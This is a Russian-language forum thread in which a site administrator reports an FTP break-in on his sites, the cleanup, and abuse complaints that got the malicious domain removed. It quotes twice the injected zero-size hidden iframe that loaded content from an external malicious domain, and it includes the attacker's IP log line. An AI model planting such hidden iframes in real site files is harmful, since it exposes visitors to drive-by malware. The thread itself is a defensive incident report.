IPB

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в эту темуОткрыть новую тему
> HEUR:Exploit.Script.Generic
Aleksey S. Neshh...
сообщение 14.10.2011, 15:03
Сообщение #1


★ Freelance specialist Linux system administrator ★
Иконка группы

Группа: Администраторы
Сообщений: 5 327
Регистрация: 18.8.2006
Из: Партизанск
Пользователь №: 1
Спасибо сказали: 122 раз(а)
Россия



VIP пользователь - администратор Компьютерный гений, разработчик скриптов За финансовый вклад в развитие проекта За информационную поддержку проекта За постоянное участие в жизни форума и активное общение За рацпредложение по улучшению работы сайта и форума 5 лет на форуме За преданность форуму 5 лет на форуме Благодарность за вклад в историю города За интересные статьи и яркое творчество


Сегодня был зафиксирован неправомерный доступ к нескольким моим сайтам, в том числе и к проекту partizansk.eu. В файлы index.html, main.html, index.php и header.php была добавлена одна строчка следующего содержания: <iframe src="http://webantispider.ce.ms/in/" width=0 height=0 frameborder=0></iframe>

В связи с этим при входе на сайт или форум антивирус начал ругаться на троян HEUR:Exploit.Script.Generic, также при попытке посетить наш ресурс с браузера Mozilla Firefox, сайт блокировался с пометкой в качестве опасного, и Яндекс в поисковике сделал следующую пометку - "Сайт может угрожать безопасности вашего компьютера".

Анализируя логи сервера, мне удалось найти IP адрес злоумышленника, с которого были заменены вышеуказанные файлы.

Oct 14 04:35:22 sr pure-ftpd: (?@91.229.90.8) [INFO] New connection from 91.229.90.8.

Данный IP адрес был заблокирован на стороне CSF файрволла, а также в адрес:

person: H-1120 Budapest
address: Street Gabor Denes, 4
address: Hungary
abuse-mailbox: abuse@ro-net.eu
phone: +3614585544
nic-hdl: AV6418-RIPE
mnt-by: VAROVAEV-MNT
source: RIPE # Filtered

была отправлена абуза (жалоба) с просьбой принять необходимые меры к пользователю, который осуществлял выход с вышеуказанного IP-адреса к нашему ресурсу в указанное время. В Яндекс.Вебмастер была заказана перепроверка сайта, она займет несколько дней. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». Все заражённые файлы были восстановлены из бэкапа, поэтому при посещении нашего ресурса вашему компьютеру уже ничего не угрожает!

Всё же на всякий случай предлагаю Вам обновить свои антивирусные базы и проверить антивирусом компьютер.


--------------------
Подарки: (Всего подарков: 16 )


--------------------
Хорошо когда о тебе говорят. Плохо, когда не вспоминают. :)
Всё написанное под моим ником является исключительно личным мнением меня как частного лица, моим оценочным суждением и не является выражением официальной позиции никаких организаций.

Открыта донат-страничка для поддержки сайта финансово https://lk.pay2me.world/projects/5c006378c60465045249af8c/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Aleksey S. Neshh...
сообщение 14.10.2011, 19:19
Сообщение #2


★ Freelance specialist Linux system administrator ★
Иконка группы

Группа: Администраторы
Сообщений: 5 327
Регистрация: 18.8.2006
Из: Партизанск
Пользователь №: 1
Спасибо сказали: 122 раз(а)
Россия



VIP пользователь - администратор Компьютерный гений, разработчик скриптов За финансовый вклад в развитие проекта За информационную поддержку проекта За постоянное участие в жизни форума и активное общение За рацпредложение по улучшению работы сайта и форума 5 лет на форуме За преданность форуму 5 лет на форуме Благодарность за вклад в историю города За интересные статьи и яркое творчество


Отправил днём жалобу на адрес abuse@ro-net.eu

Hello Abuse,

Сегодня Oct 14 04:35:22 sr pure-ftpd: (?@91.229.90.8) [INFO] New connection from 91.229.90.8. был осуществлён неправомерный доступ к файлам сайта partizansk.eu, тем самым были изменены все index/main файлы с расширением html и добавлена следующая строка:

<iframe src="http://webantispider.ce.ms/in/" width=0 height=0 frameborder=0></iframe>

Просьба принять необходимые меры к пользователю, который осуществлял выход с вышеуказанного IP-адреса к нашему ресурсу в указанное выше время, в противном случае мы оставляем за собой право обратиться в правоохранительные органы.

Thank you in advance for your cooperation.


Получил следующий ответ:

Цитата
abuse@ro-net.eu <abuse@ro-net.eu>
Hello. Thanks for the information. We will investigate this and solve asap.

Ну посмотрим, какие меры будут приняты. Также отправил жалобу в адрес регистратора доменного имени.


--------------------
Подарки: (Всего подарков: 16 )


--------------------
Хорошо когда о тебе говорят. Плохо, когда не вспоминают. :)
Всё написанное под моим ником является исключительно личным мнением меня как частного лица, моим оценочным суждением и не является выражением официальной позиции никаких организаций.

Открыта донат-страничка для поддержки сайта финансово https://lk.pay2me.world/projects/5c006378c60465045249af8c/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Aleksey S. Neshh...
сообщение 15.10.2011, 11:40
Сообщение #3


★ Freelance specialist Linux system administrator ★
Иконка группы

Группа: Администраторы
Сообщений: 5 327
Регистрация: 18.8.2006
Из: Партизанск
Пользователь №: 1
Спасибо сказали: 122 раз(а)
Россия



VIP пользователь - администратор Компьютерный гений, разработчик скриптов За финансовый вклад в развитие проекта За информационную поддержку проекта За постоянное участие в жизни форума и активное общение За рацпредложение по улучшению работы сайта и форума 5 лет на форуме За преданность форуму 5 лет на форуме Благодарность за вклад в историю города За интересные статьи и яркое творчество


Яндекс снял пометку о потенциальной опасности сайта.
В результатах поиска сайт тоже выводится без пометок.


--------------------
Подарки: (Всего подарков: 16 )


--------------------
Хорошо когда о тебе говорят. Плохо, когда не вспоминают. :)
Всё написанное под моим ником является исключительно личным мнением меня как частного лица, моим оценочным суждением и не является выражением официальной позиции никаких организаций.

Открыта донат-страничка для поддержки сайта финансово https://lk.pay2me.world/projects/5c006378c60465045249af8c/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Олег Масловец
сообщение 16.10.2011, 14:44
Сообщение #4


Интересующийся
Иконка группы

Группа: Заблокированные
Сообщений: 38
Регистрация: 26.12.2010
Из: Лесозаводск
Пользователь №: 2 127
Спасибо сказали: 6 раз(а)
Россия



За постоянное участие в жизни форума и активное общение


Да здравствуют админы, честь вам и хвала! сайт открывается без проблем. clapping.gif


--------------------
Подарки: (Всего подарков: 0 )
У пользователя нет подарков
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения
Aleksey S. Neshh...
сообщение 17.10.2011, 12:28
Сообщение #5


★ Freelance specialist Linux system administrator ★
Иконка группы

Группа: Администраторы
Сообщений: 5 327
Регистрация: 18.8.2006
Из: Партизанск
Пользователь №: 1
Спасибо сказали: 122 раз(а)
Россия



VIP пользователь - администратор Компьютерный гений, разработчик скриптов За финансовый вклад в развитие проекта За информационную поддержку проекта За постоянное участие в жизни форума и активное общение За рацпредложение по улучшению работы сайта и форума 5 лет на форуме За преданность форуму 5 лет на форуме Благодарность за вклад в историю города За интересные статьи и яркое творчество


Получил ответ от регистратора:

Цитата
We have processed your spam report for www.webantispider.ce.ms and deleted the domain and account holding it.

Отключили домен. smile.gif


--------------------
Подарки: (Всего подарков: 16 )


--------------------
Хорошо когда о тебе говорят. Плохо, когда не вспоминают. :)
Всё написанное под моим ником является исключительно личным мнением меня как частного лица, моим оценочным суждением и не является выражением официальной позиции никаких организаций.

Открыта донат-страничка для поддержки сайта финансово https://lk.pay2me.world/projects/5c006378c60465045249af8c/
Вернуться в начало страницы
 
+Ответить с цитированием данного сообщения

Ответить в эту темуОткрыть новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



- Текстовая версия Сейчас: 23.9.2019, 0:36
Яндекс.Метрика
Форум может содержать информацию и материалы только для совершеннолетних (18+)